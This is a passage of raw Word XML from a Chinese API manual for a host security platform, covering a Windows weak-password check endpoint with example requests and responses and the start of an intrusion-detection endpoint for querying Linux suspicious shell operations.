      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/win/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DD1D71"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1203"/>
        <w:gridCol w:w="1977"/>
        <w:gridCol w:w="3830"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="36D48FC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1BF3FD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5100A8AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21537D51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AFB540F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0E18DF5B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="139D88D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D9739A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D8BB98C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="045A0FB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组范围</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64FA7715" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3D68AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE55452" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51E08C5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E754C3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3295267F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77B73FEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C1CB5D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04783F31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="141CDE9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EF29A79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1CE09B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>全部主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>group</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"group"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE1938B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6114B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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 job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07321CE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288B754E"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5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no online agent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091FEB56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893E5FC"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rrorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>errorMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"已有任务正在执行"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEAC0AC"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760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B7DE6C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4EE754D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B16FD9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C0C466E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DF6ADFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B8E38B1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="180B43BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0331EB79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D233D93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BFE0839" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A21AACE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="261" w:name="_Toc115166205"/>
      <w:bookmarkStart w:id="262" w:name="入侵检测"/>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="252"/>
      <w:bookmarkEnd w:id="260"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>入侵检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="261"/>
    </w:p>
    <w:p w14:paraId="38A265C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Toc115166206"/>
      <w:bookmarkStart w:id="264" w:name="可疑操作"/>
      <w:r>
        <w:t>可疑操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
    </w:p>
    <w:p w14:paraId="4927149A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="265" w:name="_Toc115166207"/>
      <w:bookmarkStart w:id="266" w:name="查询结果-1"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="265"/>
    </w:p>
    <w:p w14:paraId="7B4E3035" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux可疑操作上报事件的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C6069" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B590F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shelllog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="05048825"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298"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BB149B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9E79D67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="658E4777" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E589246" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46F04C70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44A4ED0B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B64DF72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57DCF194" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="522C9A73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="142E05E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58BAE31F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0626AA72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>logTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14659D07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1945BF35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23C5076F" w14:textId="65E5777D" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>上报时间，格式参考</w:t>
            </w:r>
